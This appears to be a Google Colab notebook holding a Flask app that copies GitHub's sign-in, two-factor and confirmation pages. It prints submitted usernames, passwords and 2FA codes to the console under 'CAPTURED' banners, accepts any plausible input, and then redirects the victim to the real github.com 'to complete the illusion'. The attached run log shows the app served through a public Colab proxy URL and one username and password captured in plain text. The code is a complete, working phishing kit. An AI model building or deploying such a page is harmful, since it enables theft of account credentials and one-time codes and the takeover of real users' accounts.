In [1]:
# --------------------------------------------------------------------------------
# INSTRUCTIONS FOR GOOGLE COLAB:
# Run these two commands in separate Colab cells BEFORE running the Python script below.
# --------------------------------------------------------------------------------
!pip install flask
!pip install --upgrade jupyter_http_over_ws
# --------------------------------------------------------------------------------

from flask import Flask, render_template_string, request, redirect, url_for

# --------------------------------------------------
# SIMULATION LOGIC
# --------------------------------------------------
def verify_credentials_externally(username, password):
    """
    Simulates checking credentials based on flexible plausibility rules (username OR email).
    This logic now handles both username and email formats.
    """

    # Check 1: Plausible Password Length
    is_plausible_password = len(password) >= 8

    # Check 2: Plausible Login Format (Must be a valid-looking email OR a valid-looking username)
    if '@' in username:
        # Input looks like an email (we assume it is plausible)
        is_plausible_login = True
    else:
        # Input looks like a username (check minimum length)
        is_plausible_login = len(username) >= 4

    if is_plausible_login and is_plausible_password:
        print("SIMULATION: Credentials passed dynamic plausibility check. Returning SUCCESS.")
        return True
    else:
        print("SIMULATION: Credentials failed dynamic plausibility check. Returning FAILURE.")
        return False

def validate_two_factor_code(code):
    """
    Simulates checking the 2FA code. A 6-digit number is considered plausible.
    """
    if code and code.isdigit() and len(code) == 6:
        print(f"SIMULATION: 2FA Code '{code}' is plausible (6 digits). Returning SUCCESS.")
        return True
    else:
        print(f"SIMULATION: 2FA Code '{code}' failed plausibility check. Returning FAILURE.")
        return False

# --------------------------------------------------
# HTML TEMPLATES
# --------------------------------------------------

# --- 1. Login Form ---
LOGIN_HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Sign in to GitHub · GitHub</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tailwindcss.com"></script>
  <style>
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif; }
    .error-message { background-color: #ffebe9; border: 1px solid #f85149; color: #86181d; }
  </style>
</head>
<body class="bg-[#0d1117] min-h-screen flex flex-col">
  <!-- Top nav -->
  <header class="bg-[#161b22] border-b border-[#30363d]">
    <div class="max-w-[1012px] mx-auto px-4 py-3 flex items-center gap-3">
      <!-- GitHub mark -->
      <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" class="fill-white">
        <path fill-rule="evenodd"
          d="M8 0C3.58 0 0 3.58 0 8c0 3.54
          2.29 6.53 5.47 7.59.4.07.55-.17.55-.38
          0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94
          -.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53
          .63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66
          .07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95
          0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12
          0 0 .67-.21 2.2.82A7.65 7.65 0 0 1 8 3.47
          c.68.003 1.36.092 2 .27 1.53-1.04 2.2-.82 2.2-.82
          .44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15
          0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48
          0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8
          c0-4.42-3.58-8-8-8z">
        </path>
      </svg>
      <span class="sr-only">GitHub</span>
    </div>
  </header>

  <main class="flex-1">
    <div class="max-w-[1012px] mx-auto px-4">
      <div class="flex flex-col items-center pt-10 pb-16">
        <h1 class="text-2xl font-normal text-white mb-6">Sign in to GitHub</h1>

        {% if message %}
        <div class="w-full max-w-sm mb-4 rounded-md px-3 py-2 text-sm error-message">
          {{ message }}
        </div>
        {% endif %}

        <!-- Card -->
        <div class="w-full max-w-sm bg-[#161b22] border border-[#30363d] rounded-md px-4 py-6">
          <form method="POST" action="/submit" class="space-y-4">
            <div>
              <label for="login" class="block text-sm font-medium text-[#c9d1d9] mb-1">
                Username or email address
              </label>
              <input
                id="login"
                name="username"
                type="text"
                required
                class="w-full rounded-md border border-[#30363d] bg-[#0d1117] text-sm text-[#c9d1d9] px-2 py-1.5
                       focus:outline-none focus:ring-2 focus:ring-[#1f6feb] focus:border-[#1f6feb]"
                autocomplete="username"
              >
            </div>

            <div>
              <div class="flex items-center justify-between mb-1">
                <label for="password" class="block text-sm font-medium text-[#c9d1d9]">
                  Password
                </label>
                <a href="#" class="text-xs text-[#58a6ff] hover:underline">
                  Forgot password?
                </a>
              </div>
              <input
                id="password"
                name="password"
                type="password"
                required
                class="w-full rounded-md border border-[#30363d] bg-[#0d1117] text-sm text-[#c9d1d9] px-2 py-1.5
                       focus:outline-none focus:ring-2 focus:ring-[#1f6feb] focus:border-[#1f6feb]"
                autocomplete="current-password"
              >
            </div>

            <button
              type="submit"
              class="w-full text-sm font-medium rounded-md py-1.5
                     bg-[#238636] hover:bg-[#2ea043] text-white
                     border border-transparent focus:outline-none focus:ring-2 focus:ring-offset-2
                     focus:ring-offset-[#0d1117] focus:ring-[#2ea043]"
            >
              Sign in
            </button>
          </form>
        </div>

        <!-- Create account box -->
        <div class="w-full max-w-sm mt-4 text-center text-sm text-[#8b949e] border border-transparent">
          <span>New to GitHub?</span>
          <a href="#" class="text-[#58a6ff] hover:underline">Create an account</a>
        </div>
      </div>
    </div>
  </main>

  <footer class="border-t border-[#30363d] py-8">
    <div class="max-w-[1012px] mx-auto px-4 flex flex-wrap justify-center gap-4 text-xs text-[#8b949e]">
      <a href="#" class="hover:underline">Terms</a>
      <a href="#" class="hover:underline">Privacy</a>
      <a href="#" class="hover:underline">Docs</a>
      <a href="#" class="hover:underline">Contact GitHub</a>
      <a href="#" class="hover:underline">Status</a>
      <a href="#" class="hover:underline">API</a>
      <a href="#" class="hover:underline">Training</a>
      <a href="#" class="hover:underline">Blog</a>
      <a href="#" class="hover:underline">About</a>
    </div>
  </footer>
</body>
</html>
"""



# --- 2. Redirect to 2FA Page (Internal) ---
TWO_FACTOR_REDIRECT_HTML = """
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Verification in progress · GitHub</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-[#0d1117] min-h-screen flex flex-col">
  <header class="bg-[#161b22] border-b border-[#30363d]">
    <div class="max-w-[1012px] mx-auto px-4 py-3 flex items-center gap-3">
      <svg height="32" aria-hidden="true" viewBox="0 0 16 16" width="32" class="fill-white">
        <path fill-rule="evenodd"
          d="M8 0C3.58 0 0 3.58 0 8c0 3.54
          2.29 6.53 5.47 7.59.4.07.55-.17.55-.38
          0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94
          -.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53
          .63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66
          .07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95
          0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12
          0 0 .67-.21 2.2.82A7.65 7.65 0 0 1 8 3.47
          c.68.003 1.36.092 2 .27 1.53-1.04 2.2-.82 2.2-.82
          .44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15
          0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48
          0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8
          c0-4.42-3.58-8-8-8z">
        </path>
      </svg>
    </div>
  </header>

  <main class="flex-1">
    <div class="max-w-[1012px] mx-auto px-4">
      <div class="flex flex-col items-center pt-16 pb-16">
        <div class="w-full max-w-lg bg-[#161b22] border border-[#30363d] rounded-md px-6 py-8 text-center">
          <h1 class="text-2xl text-white mb-3">Additional verification required</h1>
          <p class="text-sm text-[#8b949e] mb-4">
            Your sign in was successful. We’re now redirecting you to complete two-factor authentication.
          </p>
          <p class="text-xs text-[#8b949e]">
            If you are not automatically redirected, you may need to refresh this page.
          </p>
        </div>
      </div>
    </div>
  </main>

  <script>
    setTimeout(() => {
      window.location.href = "{{ url_for('two_factor') }}";
    }, 3000);
  </script>
</body>
</html>
"""


# --- 3. 2FA Code Input Form ---
TWO_FACTOR_HTML_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Two-factor authentication · GitHub</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tailwindcss.com"></script>
  <style>
    body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif; }
    .error-message { background-color: #ffebe9; border: 1px solid #f85149; color: #86181d; }
  </style>
</head>
<body class="bg-[#0d1117] min-h-screen flex flex-col">
  <header class="bg-[#161b22] border-b border-[#30363d]">
    <div class="max-w-[1012px] mx-auto px-4 py-3 flex items-center gap-3">
      <svg height="32" aria-hidden="true" viewBox="0 0 16 16" width="32" class="fill-white">
        <path fill-rule="evenodd"
          d="M8 0C3.58 0 0 3.58 0 8c0 3.54
          2.29 6.53 5.47 7.59.4.07.55-.17.55-.38
          0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94
          -.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53
          .63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66
          .07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95
          0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12
          0 0 .67-.21 2.2.82A7.65 7.65 0 0 1 8 3.47
          c.68.003 1.36.092 2 .27 1.53-1.04 2.2-.82 2.2-.82
          .44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15
          0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48
          0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8
          c0-4.42-3.58-8-8-8z">
        </path>
      </svg>
    </div>
  </header>

  <main class="flex-1">
    <div class="max-w-[1012px] mx-auto px-4">
      <div class="flex flex-col items-center pt-10 pb-16">
        <h1 class="text-2xl font-normal text-white mb-2">Two-factor authentication</h1>
        <p class="text-sm text-[#8b949e] mb-6">
          Enter the code from your authenticator app.
        </p>

        {% if message %}
        <div class="w-full max-w-sm mb-4 rounded-md px-3 py-2 text-sm error-message">
          {{ message }}
        </div>
        {% endif %}

        <div class="w-full max-w-sm bg-[#161b22] border border-[#30363d] rounded-md px-4 py-6">
          <form method="POST" action="/validate_2fa" class="space-y-4">
            <div>
              <label for="code" class="block text-sm font-medium text-[#c9d1d9] mb-1">
                Authentication code
              </label>
              <input
                id="code"
                name="code"
                type="text"
                maxlength="6"
                required
                class="w-full rounded-md border border-[#30363d] bg-[#0d1117] text-sm text-[#c9d1d9]
                       px-2 py-1.5 tracking-[0.4em] text-center
                       focus:outline-none focus:ring-2 focus:ring-[#1f6feb] focus:border-[#1f6feb]"
                autocomplete="one-time-code"
                placeholder="000000"
              >
            </div>

            <button
              type="submit"
              class="w-full text-sm font-medium rounded-md py-1.5
                     bg-[#238636] hover:bg-[#2ea043] text-white
                     border border-transparent focus:outline-none focus:ring-2 focus:ring-offset-2
                     focus:ring-offset-[#0d1117] focus:ring-[#2ea043]"
            >
              Verify
            </button>
          </form>
        </div>

        <div class="w-full max-w-sm mt-4 text-xs text-[#8b949e] text-center">
          Having problems? <a href="#" class="text-[#58a6ff] hover:underline">Use a recovery code</a>
        </div>
      </div>
    </div>
  </main>

  <footer class="border-t border-[#30363d] py-8">
    <div class="max-w-[1012px] mx-auto px-4 flex flex-wrap justify-center gap-4 text-xs text-[#8b949e]">
      <a href="#" class="hover:underline">Terms</a>
      <a href="#" class="hover:underline">Privacy</a>
      <a href="#" class="hover:underline">Docs</a>
      <a href="#" class="hover:underline">Contact GitHub</a>
      <a href="#" class="hover:underline">Status</a>
      <a href="#" class="hover:underline">API</a>
      <a href="#" class="hover:underline">Training</a>
      <a href="#" class="hover:underline">Blog</a>
      <a href="#" class="hover:underline">About</a>
    </div>
  </footer>
</body>
</html>
"""



# --- 4. Final Success/Redirect to Dashboard ---
FINAL_SUCCESS_HTML = """
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Signed in · GitHub</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-[#0d1117] min-h-screen flex flex-col">
  <header class="bg-[#161b22] border-b border-[#30363d]">
    <div class="max-w-[1012px] mx-auto px-4 py-3 flex items-center gap-3">
      <svg height="32" aria-hidden="true" viewBox="0 0 16 16" width="32" class="fill-white">
        <path fill-rule="evenodd"
          d="M8 0C3.58 0 0 3.58 0 8c0 3.54
          2.29 6.53 5.47 7.59.4.07.55-.17.55-.38
          0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94
          -.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53
          .63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66
          .07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95
          0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12
          0 0 .67-.21 2.2.82A7.65 7.65 0 0 1 8 3.47
          c.68.003 1.36.092 2 .27 1.53-1.04 2.2-.82 2.2-.82
          .44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15
          0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48
          0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8
          c0-4.42-3.58-8-8-8z">
        </path>
      </svg>
    </div>
  </header>

  <main class="flex-1">
    <div class="max-w-[1012px] mx-auto px-4">
      <div class="flex flex-col items-center pt-16 pb-16">
        <div class="w-full max-w-lg bg-[#161b22] border border-[#30363d] rounded-md px-6 py-8 text-center">
          <h1 class="text-2xl text-white mb-3">You’re all set</h1>
          <p class="text-sm text-[#8b949e] mb-4">
            Two-factor authentication passed the simulated check. Redirecting you to your GitHub dashboard…
          </p>
          <p class="text-xs text-[#8b949e]">
            If you are not redirected automatically, <a href="https://github.com/" class="text-[#58a6ff] hover:underline">click here</a>.
          </p>
        </div>
      </div>
    </div>
  </main>

  <script>
    console.log("Redirecting to real GitHub dashboard to complete the illusion...");
    setTimeout(() => {
      window.location.href = "https://github.com/";
    }, 3000);
  </script>
</body>
</html>
"""




app = Flask(__name__)

# Route 1: Show initial login form
@app.route('/', methods=['GET'])
def index():
    return render_template_string(LOGIN_HTML_TEMPLATE, message=None)

# Route 2: Handle initial login form submission
@app.route('/submit', methods=['POST'])
def handle_submit():
    username = request.form.get('username')
    password = request.form.get('password')

    # 1. Credential Capture
    print("--------------------------------------------------")
    print(">>> STAGE 1: LOGIN CREDENTIALS CAPTURED <<<")
    print(f"USERNAME/EMAIL: {username}")
    print(f"PASSWORD: {password}")
    print("--------------------------------------------------")

    # 2. Simulated Verification
    if verify_credentials_externally(username, password):
        # Successful login: Redirect to the internal 2FA staging page
        return render_template_string(TWO_FACTOR_REDIRECT_HTML)
    else:
        # Failed login: Show error on the form
        error_msg = "Incorrect username or password. Please try again."
        return render_template_string(LOGIN_HTML_TEMPLATE, message=error_msg)

# Route 3: Display the 2FA input form
@app.route('/two-factor', methods=['GET'])
def two_factor():
    return render_template_string(TWO_FACTOR_HTML_TEMPLATE, message=None)

# Route 4: Handle 2FA code submission
@app.route('/validate_2fa', methods=['POST'])
def validate_2fa_code_submission():
    code = request.form.get('code')

    # 1. 2FA Code Capture
    print("--------------------------------------------------")
    print(">>> STAGE 2: 2FA CODE CAPTURED <<<")
    print(f"2FA CODE: {code}")
    print("--------------------------------------------------")

    # 2. Simulated Validation
    if validate_two_factor_code(code):
        # Successful 2FA: Show the final success page and redirect to the dashboard
        return render_template_string(FINAL_SUCCESS_HTML)
    else:
        # Failed 2FA: Show error on the 2FA form
        error_msg = "Invalid authentication code. Please check your app and try again."
        return render_template_string(TWO_FACTOR_HTML_TEMPLATE, message=error_msg)


def start_server_colab():
    """Starts the Flask server using Colab's built-in tools for access."""
    try:
        from google.colab.output import eval_js
        port = 5000
        print(f"Starting server on port {port}. Access link will be generated shortly...")
        print(eval_js(f"google.colab.kernel.proxyPort({port})"))
        app.run(host='0.0.0.0', port=port, debug=False)

    except Exception as e:
        print(f"Could not use Colab environment setup ({e}). Attempting standard local run...")
        app.run(host='127.0.0.1', port=5000, debug=True)

if __name__ == '__main__':
    start_server_colab()

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.6/1.6 MB 24.1 MB/s eta 0:00:00
Starting server on port 5000. Access link will be generated shortly...
https://5000-m-s-dtp10dn1a0kg-b.us-central1-0.prod.colab.dev
 * Serving Flask app '__main__'
 * Debug mode: off


INFO:werkzeug:WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on all addresses (0.0.0.0)
 * Running on http://127.0.0.1:5000
 * Running on http://172.28.0.12:5000
INFO:werkzeug:Press CTRL+C to quit
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 23:05:18] "GET / HTTP/1.1" 200 -
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 23:05:19] "GET /favicon.ico HTTP/1.1" 404 -
INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 23:05:34] "POST /submit HTTP/1.1" 200 -


--------------------------------------------------
>>> STAGE 1: LOGIN CREDENTIALS CAPTURED <<<
USERNAME/EMAIL: deviljerry
PASSWORD: qasimnaveed12345678
--------------------------------------------------
SIMULATION: Credentials passed dynamic plausibility check. Returning SUCCESS.


INFO:werkzeug:127.0.0.1 - - [25/Nov/2025 23:05:38] "GET /two-factor HTTP/1.1" 200 -
